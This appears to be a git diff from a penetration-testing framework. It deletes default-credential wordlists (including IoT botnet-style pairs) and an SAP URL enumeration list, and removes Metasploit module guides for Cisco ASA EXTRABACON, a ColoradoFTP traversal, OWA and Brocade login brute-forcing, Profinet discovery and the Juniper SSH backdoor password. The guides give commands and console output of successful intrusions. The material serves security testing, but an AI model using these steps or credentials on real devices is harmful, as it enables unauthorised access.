-user
-realtek
-1111111
-54321
-7ujMko0admin
-meinsm
-fucker
@@ -1785,36 +1785,3 @@ AURORA$JIS$UTILITY$
 wlcsystem wlcsystem
 news 
 CPRM 
-root xc3511
-root vizxv
-root 888888
-root xmhdipc
-root juantech
-root 123456
-root 54321
-root 1111
-root 666666
-root klv123
-service service
-admin1 password
-666666 666666
-888888 888888
-ubnt ubnt
-root klv1234
-root Zte521
-root hi3518
-root jvbzd
-root anko
-root zlxx.
-root 7ujMko0vizxv
-root 7ujMko0admin
-root ikwb
-root dreambox
-root user
-root realtek
-root 00000000
-admin 1111111
-admin 54321
-admin 7ujMko0admin
-admin meinsm
-mother fucker
@@ -913,8 +913,3 @@ AUTOLOG1
 AURORA$JIS$UTILITY$
 wlcsystem
 CPRM
-Admin1
-ubnt
-666666
-888888
-mother
@@ -16,4 +16,3 @@ xampp
 wampp
 ppmax2011
 turnkey
-vagrant
@@ -8,4 +8,3 @@ wampp xampp
 newuser wampp
 xampp-dav-unsecure ppmax2011 
 admin turnkey
-vagrant vagrant
@@ -11,4 +11,3 @@ sys
 wampp
 newuser
 xampp-dav-unsecure
-vagrant
@@ -1,43 +0,0 @@
-
-00000000
-1111
-1111111
-1234
-12345
-123456
-54321
-666666
-7ujMko0admin
-7ujMko0vizxv
-888888
-admin
-admin1234
-anko
-default
-dreambox
-fucker
-guest
-hi3518
-ikwb
-juantech
-jvbzd
-klv123
-klv1234
-meinsm
-pass
-password
-realtek
-root
-service
-smcadmin
-supervisor
-support
-system
-tech
-ubnt
-user
-vizxv
-xc3511
-xmhdipc
-zlxx.
-Zte521
@@ -1,15 +0,0 @@
-666666
-888888
-admin
-admin1
-administrator
-Administrator
-guest
-mother
-root
-service
-supervisor
-support
-tech
-ubnt
-user
@@ -1,60 +0,0 @@
-root xc3511
-root vizxv
-root admin
-admin admin
-root 888888
-root xmhdipc
-root default
-root juantech
-root 123456
-root 54321
-support support
-root 
-admin password
-root root
-root 12345
-user user
-admin 
-root pass
-admin admin1234
-root 1111
-admin smcadmin
-admin 1111
-root 666666
-root password
-root 1234
-root klv123
-Administrator admin
-service service
-supervisor supervisor
-guest guest
-guest 12345
-admin1 password
-administrator 1234
-666666 666666
-888888 888888
-ubnt ubnt
-root klv1234
-root Zte521
-root hi3518
-root jvbzd
-root anko
-root zlxx.
-root 7ujMko0vizxv
-root 7ujMko0admin
-root system
-root ikwb
-root dreambox
-root user
-root realtek
-root 00000000
-admin 1111111
-admin 1234
-admin 12345
-admin 54321
-admin 123456
-admin 7ujMko0admin
-admin pass
-admin meinsm
-tech tech
-mother fucker
@@ -88393,4 +88393,3 @@ z
 émigrés
 épée
 étude
-vagrant
@@ -49,4 +49,3 @@ root dbps
 root ibm
 root monitor
 root turnkey
-root vagrant
@@ -15,8 +15,8 @@
 /apidocs/
 /apidocs/allclasses-frame.html
 /apidocs/com/sap/engine/connector/connection/IConnection.html
-/apidocs/com/sap/engine/deploy/manager/Deploymanager.html
 /apidocs/com/sap/engine/deploy/manager/DeploymanagerFactory.html
+/apidocs/com/sap/engine/deploy/manager/Deploymanager.html
 /apidocs/com/sap/engine/deploy/manager/LoginInfo.html
 /ApplicationAdminProvider
 /bcb/
@@ -27,7 +27,6 @@
 /bcb/bcbadmSystemInfo.jsp
 /bcbtest/start.jsp
 /BI_UDC
-/BizcCommLayerAuthoring/Config?wsdl
 /BizcCommLayerAuthoring/Config1
 /BizcCommLayerAuthoring/Config1?wsdl
 /bwtest
@@ -36,7 +35,6 @@
 /CAFDataService/Config?wsdl
 /ccsui
 /CmcApp/logon.faces
-/CMSRTS/Config?wsdl
 /CMSRTS/Config1
 /CMSRTS/Config1?wsdl
 /com~tc~lm~webadmin~httpprovider~web
@@ -46,27 +44,22 @@
 /DataArchivingService
 /dispatcher
 /dswsbobje
-/dswsbobje/services/BICatalog?wsdl
 /dswsbobje/services/listServices
-/examples.html
+/dswsbobje/services/BICatalog?wsdl
 /examples/
 /examples_frame.html
+/examples.html
 /exchangeProfile/
 /GRMGHeartBeat
 /GRMGWSTest/service
 /GRMGWSTest/service?wsdl
 /guid/e067540a-a84c-2d10-77bf-c941bb5a9c7a
 /htmlb/
-/htmlb/docs/api/index.html
 /htmlb/index.html
-/htmlb/jsp/index.jsp
-/htmlb/moresamples.html
-/htmlb/samples.html
 /IciActionItemService/IciActionItemConf
 /IciActionItemService/IciActionItemConf?wsdl
 /IciChatLineService/IciChatLineConf
 /IciChatLineService/IciChatLineConf?wsdl
-/IciChatService/IciChatConf?wsdl
 /IciEventService/
 /IciEventService/IciEventConf
 /IciEventService/IciEventConf?wsdl
@@ -114,20 +107,15 @@
 /Lighthammer
 /logon
 /logon/index.jsp
-/logon/logonServlet
 /logon/logonServlet?redirectURL=%2Fuseradmin%2FuserAdminServlet
 /logon/logonServlet?redirectURL=%2FVC%2Fdefault.jsp
-/logon/logonServlet?redirectURL=%Fuseradmin%FuserAdminServlet
-/logon/logonServlet?redirectURL=%FVC%Fdefault.jsp
 /main.html
 /meSync/HttpGRMGTest.html
 /mmr/
-/mmr/mmr/MMRUI.html
 /Modeler
 /modeller/
 /modeller/index.html
 /monitoring
-/monitoring/SystemInfo
 /nwa
 /OpenSQLMonitors/
 /PerformacetraceTraceApplication
@@ -147,63 +135,54 @@
 /samlssodemo_source
 /sap/
 /sap/admin
-/sap/admin/public/index.html
 /sap/bc/bsp/
 /sap/bc/bsp/esh_os_service/favicon.gif
 /sap/bc/bsp/sap
-/sap/bc/bsp/sap
 /sap/bc/bsp/sap/alertinbox
 /sap/bc/bsp/sap/bsp_dlc_frcmp
 /sap/bc/bsp/sap/bsp_veri
 /sap/bc/bsp/sap/bsp_verificatio
-/sap/bc/bsp/sap/bsp_verificatio
 /sap/bc/bsp/sap/bsp_wd_base
 /sap/bc/bsp/sap/bspwd_basics
 /sap/bc/bsp/sap/certmap
 /sap/bc/bsp/sap/certreq
 /sap/bc/bsp/sap/crm_bsp_frame
-/sap/bc/bsp/sap/crm_thtmlb_util
-/sap/bc/bsp/sap/crm_ui_frame
-/sap/bc/bsp/sap/crm_ui_start
 /sap/bc/bsp/sap/crmcmp_bpident/
 /sap/bc/bsp/sap/crmcmp_brfcase
 /sap/bc/bsp/sap/crmcmp_hdr
 /sap/bc/bsp/sap/crmcmp_hdr_std
 /sap/bc/bsp/sap/crmcmp_ic_frame
-/sap/bc/bsp/sap/esh_sap_link
+/sap/bc/bsp/sap/crm_thtmlb_util
+/sap/bc/bsp/sap/crm_ui_frame
+/sap/bc/bsp/sap/crm_ui_start
 /sap/bc/bsp/sap/esh_sapgui_exe
+/sap/bc/bsp/sap/esh_sap_link
 /sap/bc/bsp/sap/graph_bsp_test
 /sap/bc/bsp/sap/graph_bsp_test/Mimes
 /sap/bc/bsp/sap/gsbirp
 /sap/bc/bsp/sap/hrrcf_wd_dovru
 /sap/bc/bsp/sap/htmlb_samples
-/sap/bc/bsp/sap/htmlb_samples
-/sap/bc/bsp/sap/ic_frw_notify
 /sap/bc/bsp/sap/iccmp_bp_cnfirm
 /sap/bc/bsp/sap/iccmp_hdr_cntnr
 /sap/bc/bsp/sap/iccmp_hdr_cntnt
 /sap/bc/bsp/sap/iccmp_header
 /sap/bc/bsp/sap/iccmp_ssc_ll/
-/sap/bc/bsp/sap/it00
+/sap/bc/bsp/sap/ic_frw_notify
 /sap/bc/bsp/sap/it00
 /sap/bc/bsp/sap/it00/default.htm
 /sap/bc/bsp/sap/it00/http_client.htm
 /sap/bc/bsp/sap/it00/http_client_xml.htm
 /sap/bc/bsp/sap/public/bc
-/sap/bc/bsp/sap/public/bc
 /sap/bc/bsp/sap/public/graphics
 /sap/bc/bsp/sap/sam_demo
 /sap/bc/bsp/sap/sam_notifying
 /sap/bc/bsp/sap/sam_sess_queue
 /sap/bc/bsp/sap/sbspext_htmlb
-/sap/bc/bsp/sap/sbspext_htmlb                                                   
-/sap/bc/bsp/sap/sbspext_xhtmlb
 /sap/bc/bsp/sap/sbspext_xhtmlb
 /sap/bc/bsp/sap/spi_admin
 /sap/bc/bsp/sap/spi_monitor
 /sap/bc/bsp/sap/sxms_alertrules
 /sap/bc/bsp/sap/system
-/sap/bc/bsp/sap/system
 /sap/bc/bsp/sap/thtmlb_scripts
 /sap/bc/bsp/sap/thtmlb_styles
 /sap/bc/bsp/sap/uicmp_ltx
@@ -229,7 +208,6 @@
 /sap/bc/gui/sap/its/designs
 /sap/bc/gui/sap/its/webgui
 /sap/bc/IDoc_XML
-/sap/bc/Mi_host_http
 /sap/bc/MIDSD
 /sap/bc/Mime
 /sap/bc/MJC
@@ -239,6 +217,7 @@
 /sap/bc/MJC/mi_service
 /sap/bc/MJC/mi_services
 /sap/bc/MY_NEW_SERV99
+/sap/bc/Mi_host_http
 /sap/bc/ping
 /sap/bc/report
 /sap/bc/soap/ici
@@ -249,16 +228,15 @@
 /sap/bc/webdynpro/sap/apb_launchpad_nwbc
 /sap/bc/webdynpro/sap/apb_lpd_light_start
 /sap/bc/webdynpro/sap/apb_lpd_start_url
+/sap/bc/webdynpro/sap/application_exit
 /sap/bc/webdynpro/sap/appl_log_trc_viewer
 /sap/bc/webdynpro/sap/appl_soap_management
-/sap/bc/webdynpro/sap/application_exit
 /sap/bc/webdynpro/sap/ccmsbi_wast_extr_testenv
 /sap/bc/webdynpro/sap/cnp_light_test
 /sap/bc/webdynpro/sap/configure_application
 /sap/bc/webdynpro/sap/configure_component
+/sap/bc/webdynpro/sap/esh_admin_ui_component
 /sap/bc/webdynpro/sap/esh_adm_smoketest_ui
-/sap/bc/webdynpro/sap/esh_admin_ui_component
-/sap/bc/webdynpro/sap/esh_admin_ui_component
 /sap/bc/webdynpro/sap/esh_eng_modelling
 /sap/bc/webdynpro/sap/esh_search_results.ui
 /sap/bc/webdynpro/sap/hrrcf_a_act_cnf_dovr_ui
@@ -284,8 +262,8 @@
 /sap/bc/webdynpro/sap/hrrcf_a_substitution_admin
 /sap/bc/webdynpro/sap/hrrcf_a_substitution_manager
 /sap/bc/webdynpro/sap/hrrcf_a_tp_assess
-/sap/bc/webdynpro/sap/hrrcf_a_unreg_job_search
 /sap/bc/webdynpro/sap/hrrcf_a_unregemp_job_search
+/sap/bc/webdynpro/sap/hrrcf_a_unreg_job_search
 /sap/bc/webdynpro/sap/hrrcf_a_unverified_cand
 /sap/bc/webdynpro/sap/sh_adm_smoketest_files
 /sap/bc/webdynpro/sap/wd_analyze_config_appl
@@ -312,28 +290,26 @@
 /sap/es/saplink
 /sap/es/search
 /sap/IStest
+/sapmc/sapmc.html
 /sap/monitoring/
 /sap/public/bc
-/sap/public/bc                                                                  
 /sap/public/bc/icons
 /sap/public/bc/icons_rtl
 /sap/public/bc/its
 /sap/public/bc/its/designs
 /sap/public/bc/its/mimes
 /sap/public/bc/its/mimes/system/SL/page/hourglass.html
-/sap/public/bc/its/mimes/system/SL/page/hourglass.html
 /sap/public/bc/its/mobile/itsmobile00
 /sap/public/bc/its/mobile/itsmobile01
 /sap/public/bc/its/mobile/rfid
 /sap/public/bc/its/mobile/start
 /sap/public/bc/its/mobile/test
-/sap/public/bc/NW_ESH_TST_AUTO
 /sap/public/bc/NWDEMO_MODEL
+/sap/public/bc/NW_ESH_TST_AUTO
 /sap/public/bc/pictograms
 /sap/public/bc/sicf_login_run
 /sap/public/bc/trex
 /sap/public/bc/ur
-/sap/public/bc/ur
 /sap/public/bc/wdtracetool
 /sap/public/bc/webdynpro
 /sap/public/bc/webdynpro/adobechallenge
@@ -345,20 +321,14 @@
 /sap/public/bc/workflow/shortcut
 /sap/public/bsp
 /sap/public/bsp/sap
-/sap/public/bsp/sap
-/sap/public/bsp/sap/htmlb
 /sap/public/bsp/sap/htmlb
 /sap/public/bsp/sap/public
-/sap/public/bsp/sap/public                                                      
-/sap/public/bsp/sap/public/bc
 /sap/public/bsp/sap/public/bc
 /sap/public/bsp/sap/public/faa
 /sap/public/bsp/sap/public/graphics
 /sap/public/bsp/sap/public/graphics/jnet_handler
 /sap/public/bsp/sap/public/graphics/mimes
 /sap/public/bsp/sap/system
-/sap/public/bsp/sap/system
-/sap/public/bsp/sap/system_public
 /sap/public/bsp/sap/system_public
 /sap/public/icf_check
 /sap/public/icf_info
@@ -387,7 +357,6 @@
 /SAPIKS2/contentShow.sap
 /SAPIKS2/jsp/adminShow.jsp
 /SAPIrExtHelp
-/sapmc/sapmc.html
 /scripts/wgate
 /servlet/com.sap.admin.Critical.Actio
 /sim/
@@ -410,14 +379,10 @@
 /TXmla
 /uddi/
 /uddiclient
-/uddiclient/jsps/index.jsp
-/uddiclient/process/
 /useradmin
 /userhome
-/utl/UsageTypesInfo
 /VC
 /vscantest/
-/webdynpro/dispatcher
 /webdynpro/dispatcher/
 /webdynpro/dispatcher/sap.com/grc~accvwdcomp
 /webdynpro/dispatcher/sap.com/grc~aewebquery
@@ -438,12 +403,10 @@
 /webdynpro/dispatcher/virsa/ccappcomp/ComplianceCalibrator
 /webdynpro/resources/sap.com/
 /webdynpro/welcome/Welcome.jsp
-/WSConnector/Config?wsdl
 /WSConnector/Config1
 /WSConnector/Config1?wsdl
 /wsd2wsdl
 /wsnavigator
-/wsnavigator/jsps/index.jsp
 /wsnavigator/jsps/redirect.jsp
 /wsnavigator/jsps/sendrequest.jsp
 /wsnavigator/jsps/test.jsp
@@ -4,4 +4,3 @@ role1
 root
 tomcat
 s3cret
-vagrant
@@ -6,4 +6,3 @@ ADMIN ADMIN
 xampp xampp
 tomcat s3cret
 QCC QLogic66
-admin vagrant
@@ -1005,4 +1005,3 @@ raspberry
 arcsight
 MargaretThatcheris110%SEXY
 karaf
-vagrant
@@ -109,4 +109,3 @@ www-data
 xpdb
 xpopr
 zabbix
-vagrant
@@ -1,115 +0,0 @@
-## General notes
-
-This is using improved shellcode, has less stages than the Equation Group
-version making it more reliable. This makes the SNMP payload packet ~150 less
-bytes. Also, the leaked version only supports 8.x, we have it working on 9.x
-versions.
-
-To add more version specific offsets, more details and a Lina file offset
-finder are available at:
-
-https://github.com/RiskSense-Ops/CVE-2016-6366
-
-## Partial list of supported versions
------------------------------------------------------------
-All of the leaked versions are available in the module
-
- 8.x
- 8.0(2)
- 8.0(3)
- 8.0(3)6
- 8.0(4)
- 8.0(4)32
- 8.0(5)
- 8.2(1)
- 8.2(2)
- 8.2(3)
- 8.2(4)
- 8.2(5)
- 8.2(5)33 `*`
- 8.2(5)41 `*`
- 8.3(1)
- 8.3(2)
- 8.3(2)39 `*`
- 8.3(2)40 `*`
- 8.3(2)-npe `*` `**`
- 8.4(1)
- 8.4(2)
- 8.4(3)
- 8.4(4)
- 8.4(4)1 `*`
- 8.4(4)3 `*`
- 8.4(4)5 `*`
- 8.4(4)9 `*`
- 8.4(6)5 `*`
- 8.4(7) `*`
- 9.x
- 9.0(1) `*`
- 9.1(1)4 `*`
- 9.2(1) `*`
- 9.2(2)8 `*`
- 9.2(3) `*`
- 9.2(4) `*`
- 9.2(4)13 `*`
-
-`*` new version support not part of the original Shadow Brokers leak
-
-`**` We currently can't distinguish between normal and NPE versions from the SNMP strings. We've commented out the NPE offsets, as NPE is very rare (it is for exporting to places where encryption is crappy), but in the future, we'd like to incorporate these versions. Perhaps as a bool option?
-
-## Verification
-
- Start `msfconsole`
- `use auxiliary/admin/cisco/cisco_asa_extrabacon`
- `set RHOST x.x.x.x`
- `check`
- `run`
- ssh admin@x.x.x.x, you will not need a valid password
- `set MODE pass-enable`
- `run`
- ssh admin@x.x.x.x, ensure fake password does not work
-
-## Checking for a vulnerable version
-
-```
-msf > use auxiliary/admin/cisco/cisco_asa_extrabacon
-msf auxiliary(cisco_asa_extrabacon) > set rhost 192.168.1.1
-rhost => 192.168.1.1
-msf auxiliary(cisco_asa_extrabacon) > check
-
-[+] Payload for Cisco ASA version 8.2(1) available!
-[*] 192.168.1.1:161 The target appears to be vulnerable.
-```
-
-## Disabling administrative password
-
-```
-  msf auxiliary(cisco_asa_extrabacon) > set
-set ACTION            set ConsoleLogging    set Prompt            set RHOST             set TimestampOutput
-set CHOST             set LogLevel          set PromptChar        set RPORT             set VERBOSE
-set COMMUNITY         set MODE              set PromptTimeFormat  set SessionLogging    set VERSION
-set CPORT             set MinimumRank       set RETRIES           set TIMEOUT           set WORKSPACE
-msf auxiliary(cisco_asa_extrabacon) > set MODE pass-
-  set MODE pass-disable  set MODE pass-enable
-msf auxiliary(cisco_asa_extrabacon) > set MODE pass-disable
-MODE => pass-disable
-msf auxiliary(cisco_asa_extrabacon) > run
-
-[*] Building pass-disable payload for version 8.2(1)...
-  [*] Sending SNMP payload...
-  [+] Clean return detected!
-[!] Don't forget to run pass-enable after logging in!
-[*] Auxiliary module execution completed
-```
-
-## Re-enabling administrative password
-
-```
-msf auxiliary(cisco_asa_extrabacon) > set MODE pass-enable
-MODE => pass-enable
-msf auxiliary(cisco_asa_extrabacon) > run
-
-[*] Building pass-enable payload for version 8.2(1)...
-  [*] Sending SNMP payload...
-  [+] Clean return detected!
-[*] Auxiliary module execution completed
-```
@@ -1,61 +0,0 @@
-## Notes
-
-While the application is based in java, I was only able to get it to exploit against Windows based targets.
-
-## Vulnerable Application
-
-  [official site](http://cftp.coldcore.com/files/coloradoftp-prime-8.zip?site=cft1&rv=19.1&nc=1) or [github backup](https://github.com/h00die/MSF-Testing-Scripts/raw/master/coloradoftp-prime-8.zip)
-  
-When installing, you must edit conf/beans.xml line 182 "localIp" to put in your IP or else `pasv` won't work.
-
-## Verification Steps
-
-  1. Install the application
-  2. Start msfconsole
-  3. Do: `use auxiliary/scanner/ftp/colorado_ftp_traversal`
-  4. Do: `set rhosts <ip>`
-  5. Do: `run`
-  6. You should get the xml-users.xml file
-
-## Options
-
-  **FTPUSER**
-
-  Default user for Colorado FTP is `ftpuser`
-
-  **FTPPASS**
-
-  Default password for Colorado FTP is `ftpuser123`
-
-  **DEPTH**
-
-  Default depth of ../ to do is 2 to get back to the root of Colorado FTP.  This can run anywhere, so you may have to play a bit to find the root.
-
-## Scenarios
-
-  A run to obtain the user file (default in this case)
-
-    msf > use auxiliary/scanner/ftp/colorado_ftp_traversal
-    msf auxiliary(colorado_ftp_traversal) > set rhosts 1.1.1.1
-    rhosts => 1.1.1.1
-    msf auxiliary(colorado_ftp_traversal) > set verbose true
-    verbose => true
-    msf auxiliary(colorado_ftp_traversal) > exploit
-    
-    [*] 1.1.1.1:21      - Connecting to FTP server 1.1.1.1:21...
-    [*] 1.1.1.1:21      - Connected to target FTP server.
-    [*] 1.1.1.1:21      - Authenticating as ftpuser with password ftpuser123...
-    [*] 1.1.1.1:21      - Sending password...
-    [*] 1.1.1.1:21      - \\\..\..\conf\xml-users.xml
-    [*] 1.1.1.1:21      - 150 Opening A mode data connection for \\\..\..\conf\xml-users.xml.
-    
-    [*] 1.1.1.1:21      - Data returned:
-    
-    <users>
-    
-      <user name="ftpuser" pass="ftpuser123"/>
-    
-    </users>
-    [+] 1.1.1.1:21      - Stored conf\xml-users.xml to /root/.msf4/loot/20160918184409_default_1.1.1.1_coloradoftp.ftp._168381.xml
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
@@ -1,23 +0,0 @@
-This module is for password guessing against OWA's EWS service which often exposes NTLM authentication over HTTPS. It is typically faster than the traditional form-based OWA login method.
-
-## Verification Steps
-
-1. Do: ```use auxiliary/scanner/http/owa_ews_login```
-2. Do: ```set RHOSTS [IP]```
-3. Set TARGETURI if necessary.
-4. Do: ```run```
-
-## Sample Output
-
-```
-msf auxiliary(owa_ews_login) > run
-
-[+] Found NTLM service at /ews/ for domain OWAMSF.
-[+] OWA_EWS - Successful login: Administrator:monkey
-[-] OWA_EWS - Failed login: root:
-[-] OWA_EWS - Failed login: admin:
-[-] OWA_EWS - Failed login: guest:
-[-] OWA_EWS - Failed login: root:root
-[-] OWA_EWS - Failed login: root:password
-[-] OWA_EWS - Failed login: root:1234
-```
@@ -1,76 +0,0 @@
-Siemens Industrial controllers and most other industrial OEMs 
-use a proprietary protocol to discover their devices accross a network.
-In the case of Siemens this is called the Profinet Discover Protocol. 
-Known in Wireshark as PN_DCP
-
-It works purely on Layer 2 (Ethernet addresses) and sends out a single
-multicast packet (making it safe to use in sensitive networks). 
-Each profinet enabled responds with an array of information:
- Its IP address, Subnetmask and Gateway
- Its Profinet Devicename ('Station Name')
- The Type of station
- A Vendor ID (e.g. '002a'), signifing the vendor (e.g. 'Siemens')
- A Device Role (e.g. '01'), signifing the type of device (e.g. 'IO-Controller')
- A Device ID (e.g. '010d'), signifing the device type (e.g. 'S7-1200')
-
-## Vulnerable Application
-
-This is a hardware choice of design, and as such CANNOT be changed without
-loss of compatibility. 
-Possible mitigations include: pulling the plug (literally), using network isolation
-(Firewall, Router, IDS, IPS, network segmentation, etc...) or not allowing bad
-people on your network.
-
-Most, if not all, PLC's (computers that control engines, robots, conveyor
-belts, sensors, camera's, doorlocks, CRACs ...) have vulnerabilities where,
-using their own tools, remote configuration and programming can be done
-*WITHOUT* authentication.  Investigators and underground hackers are just now
-creating simple tools to convert the, often proprietary, protocols into simple
-scripts.  The operating word here is "proprietary". Right now, the only thing
-stopping very bad stuff from happening. 
-
-## Verification Steps
-
-The following demonstrates a basic scenario, we "detect" two devices:
-
-```
-msf > search profinet
-msf > use auxiliary/scanner/scada/profinet_siemens
-msf auxiliary(profinet_siemens) > run
-
-[*] Sending packet out to eth0
-[+] Parsing packet from 00:0e:8c:cf:7b:1a
-Type of station: ET200S CPU
-Name of station: pn-io-1
-Vendor and Device Type: Siemens, ET200S
-Device Role: IO-Controller
-IP, Subnetmask and Gateway are: 172.16.108.11, 255.255.0.0, 172.16.108.11
-
-[+] Parsing packet from 00:50:56:b6:fe:b6
-Type of station: SIMATIC-PC
-Name of station: nm
-Vendor and Device Type: Siemens, PC Simulator
-Device Role: IO-Controller
-IP, Subnetmask and Gateway are: 172.16.30.102, 255.255.0.0, 172.16.0.1
-
-[+] I found 2 devices for you!
-[*] Auxiliary module execution completed
-```
-
-## Module Options
-```
-msf auxiliary(profinet_siemens) > show options
-
-Module options (auxiliary/scanner/scada/profinet_siemens):
-
-   Name       Current Setting  Required  Description
-   ----       ---------------  --------  -----------
-   INTERFACE  eth0             yes       Set an interface
-   TIMEOUT    2                yes       Seconds to wait, set longer on slower networks
-```
-
-By default, the module uses interface 'eth0', there is a check to see if it is live.
-
-The module will send out an ethernet packet and wait for responses.
-By default, it will wait 2 seconds for any responses, this is long enough for most networks.
-Increase this on larger and/or slower networks, it just increases the wait time.
@@ -115,12 +115,3 @@ set SMBPass [password]

 Note: If an account has been successfully brute-forced, that account will not be tried again.

-Additionally, if you wish to disable automatic detection of all-access systems, you can change the following option:
-
-**The DETECT_ANY_AUTH option**
-
-This option enables detection of systems accepting any authentication. A bogus login will be attempted.
-
-```
-set DETECT_ANY_AUTH false
-```
@@ -1,33 +0,0 @@
-## Vulnerable Application
-
-  Juniper JunOS between 6.2.0r15 to 6.2.0r18 and 6.3.0r12 to 6.3.0r20 are vulnerable.
-  
-  A vulnerable copy of the firmware is available for a Juiper SSG5/SSG20 (v6.3.0r19.0): [here](https://github.com/h00die/MSF-Testing-Scripts/tree/master/juniper_firmware)
-
-  For verification puposes, an example vuln python script is also available [here](https://github.com/h00die/MSF-Testing-Scripts)
-
-## Verification Steps
-
-  1. Install the application
-  2. Start msfconsole
-  3. Do: ` use auxiliary/scanner/ssh/juniper_backdoor`
-  4. Do: `set rhosts`
-  5. Do: `run`
-  6. You should see: `[+] 192.168.1.1:22 - Logged in with backdoor account admin:<<< %s(un='%s') = %u`
-
-## Scenarios
-
-  Example run against a Juniper SSG5 with vuln firmware from above link.
-
-```
-msf > use auxiliary/scanner/ssh/juniper_backdoor
-msf auxiliary(juniper_backdoor) > set rhosts 192.168.1.1
-rhosts => 192.168.1.1
-msf auxiliary(juniper_backdoor) > set verbose true
-verbose => true
-msf auxiliary(juniper_backdoor) > run
-
-[+] 192.168.1.1:22 - Logged in with backdoor account admin:<<< %s(un='%s') = %u
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-```
@@ -1,242 +0,0 @@
-## Vulnerable Application
-
-  This module is a login bruteforcer against Brocade network device's `enable` feature.
-  
-To configure the device in a vulnerable fashion, follow these steps:
-  1. Set authentication mode via: `aaa authentication enable default local`
-
-This module works against `enable` so we want to ensure telnet itself has no auth
-  **The following should not be set**: `enable telnet authentication`
-  
-This module has been verified against:
-  1. ICX6450-24 SWver 07.4.00bT311
-  2. FastIron WS 624 SWver 07.2.02fT7e1
-
-An emulator is available [here](https://github.com/h00die/MSF-Testing-Scripts/blob/master/brocade_emulator.py)
-
-## Verification Steps
-
-  1. Install the emulator or device
-  2. Start msfconsole
-  3. Do: `use auxiliary/scanner/telnet/brocade_enable_login`
-  4. Create/set a password file: `set pass_file /<passwords.lst>`
-  5. If desired: `set user_as_pass true`
-  6. Do: `set rhosts <ip>`
-  7. Do: `run`
-  8. You should get a shell.
-
-## Scenarios
-
-  Example run against ICX6450-24 SWver 07.4.00bT311
-
-```
-msf > use auxiliary/scanner/telnet/brocade_enable_login 
-msf auxiliary(brocade_enable_login) > set pass_file /passwords.lst
-pass_file => /passwords.lst
-msf auxiliary(brocade_enable_login) > set user_as_pass true
-user_as_pass => true
-msf auxiliary(brocade_enable_login) > set rhosts 192.168.50.1
-rhosts => 192.168.50.1
-msf auxiliary(brocade_enable_login) > run
-
-[*]  Attempting username gathering from config on 192.168.50.1
-[*]    Found: admin@192.168.50.1
-[*]    Found: read@192.168.50.1
-[*]    Found: port@192.168.50.1
-[*]  Attempting username gathering from running-config on 192.168.50.1
-[*]    Found: admin@192.168.50.1
-[*]    Found: read@192.168.50.1
-[*]    Found: port@192.168.50.1
-[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: admin:admin
-[*] Attempting to start session 192.168.50.1:23 with admin:admin
-[*] Command shell session 1 opened (192.168.50.2:57524 -> 192.168.50.1:23) at 2015-03-06 20:19:41 -0500
-[-] 192.168.50.1:23 - LOGIN FAILED: read:admin (Incorrect: )
-[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: read:read
-[*] Attempting to start session 192.168.50.1:23 with read:read
-[*] Command shell session 2 opened (192.168.50.2:49223 -> 192.168.50.1:23) at 2015-03-06 20:20:32 -0500
-[-] 192.168.50.1:23 - LOGIN FAILED: port:read (Incorrect: )
-[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: port:port
-[*] Attempting to start session 192.168.50.1:23 with port:port
-[*] Command shell session 3 opened (192.168.50.2:34683 -> 192.168.50.1:23) at 2015-03-06 20:21:23 -0500
-[-] 192.168.50.1:23 - LOGIN FAILED: admin:port (Unable to Connect: )
-[-] 192.168.50.1:23 - LOGIN FAILED: admin:admin (Unable to Connect: )
-[-] 192.168.50.1:23 - LOGIN FAILED: admin:12345678 (Unable to Connect: )
-[-] 192.168.50.1:23 - LOGIN FAILED: read:port (Unable to Connect: )
-[-] 192.168.50.1:23 - LOGIN FAILED: read:read (Unable to Connect: )
-[-] 192.168.50.1:23 - LOGIN FAILED: read:12345678 (Unable to Connect: )
-[-] 192.168.50.1:23 - LOGIN FAILED: port:port (Unable to Connect: )
-[-] 192.168.50.1:23 - LOGIN FAILED: port:port (Unable to Connect: )
-[-] 192.168.50.1:23 - LOGIN FAILED: port:12345678 (Unable to Connect: )
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-msf auxiliary(brocade_enable_login) > sessions -l
-
-Active sessions
-===============
-
-  Id  Type    Information                           Connection
-  --  ----    -----------                           ----------
-  1   shell   TELNET admin:admin (192.168.50.1:23)  192.168.50.2:57524 -> 192.168.50.1:23 (192.168.50.1)
-  2   shell   TELNET read:read (192.168.50.1:23)    192.168.50.2:49223 -> 192.168.50.1:23 (192.168.50.1)
-  3   shell   TELNET port:port (192.168.50.1:23)    192.168.50.2:34683 -> 192.168.50.1:23 (192.168.50.1)
-
-msf auxiliary(brocade_enable_login) > session -i 1
-[-] Unknown command: session.
-msf auxiliary(brocade_enable_login) > sessions -i 1
-[*] Starting interaction with 1...
-
-show sessions ?
-Unrecognized command
-BR-telnet@FWS624 Router#show ?
-  802-1w                 Rapid Spanning tree IEEE 802.1w D10 status
-  aaa                    Show TACACS+ and RADIUS server statistics
-  access-list            show IPv4 access-list information
-  acl-on-arp             Show ARP ACL filtering
-  arp                    Arp table
-  auth-mac-addresses     MAC Authentication status
-  batch                  Batch commands
-  boot-preference        System boot preference
-  buffer-profile         Displays active profile
-  cable-diagnostics      Show Cable Diagnostics
-  chassis                Power supply/fan/temperature
-  clock                  System time and date
-  configuration          Configuration data in startup config file
-  cpu-utilization        CPU utilization rate
-  debug                  Debug information
-  default                System default settings
-  dot1x                  Dot1x information
-  errdisable             Errdisable status
-  fdp                    CDP/FDP information
-  flash                  Flash memory contents
-  gvrp                   GVRP information
-  inline                 inline power information
-  interfaces             Port status
--More--, next page: Space, next line: Return key, quit: Control-c 
-  ip                     IP address setting
-  ipv6                   IP setting
-  license                Show license information
-  link-aggregate         802.3ad Link Aggregation Information
-  link-error-disable     Link Debouncing Control
-  link-keepalive         Link Layer Keepalive
-  lldp                   Link-Layer Discovery Protocol information
-  local-userdb           Local User Database information
-  logging                System log
-  loop-detection         loop detection status & disabled ports
-  mac-address            MAC address table
-  media                  1Gig/10G port media type
-  memory                 System memory usage
-  metro-ring             Metro ring protocol information
-  mirror                 Mirror ports
-  module                 Module type and status
-  monitor                Monitor ports
-  mstp                   show MSTP (IEEE 802.1s) information
-  optic                  Optic Temperature and Power
-  port                   Show port security
-  priority-mapping       802.1Q tagged priority setting
-  processes              Active process statistics
-  protected-link-group   Show Protected Link Group Details
